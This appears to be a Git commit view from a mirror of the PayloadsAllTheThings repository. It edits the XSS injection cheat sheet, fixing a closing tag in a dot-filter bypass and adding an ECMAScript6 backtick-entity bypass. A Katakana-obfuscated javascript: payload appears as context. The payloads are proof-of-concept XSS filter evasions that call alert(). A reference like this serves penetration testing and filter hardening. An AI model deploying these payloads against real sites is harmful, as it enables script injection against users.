daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added a new bypass variant + fixed a payload

patch-1
Infected Drake 2019-02-20 11:17:49 +05:30 committed by GitHub
parent 79f2c52ef5
commit 4187f87d0d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
XSS injection/README.md
View File

@ -465,7 +465,7 @@ You can bypass a single quote with ' in an on mousedown event handler
Bypass dot filter
```javascript
<script>window['alert'](document['domain'])<script>
<script>window['alert'](document['domain'])</script>
```
Bypass parenthesis for string - Firefox/Opera
@ -654,6 +654,12 @@ Bypass using [Katakana](https://github.com/aemkei/katakana.js)
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
Bypass using ECMAScript6 variation:
```
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
```
Bypass using Octal encoding
```javascript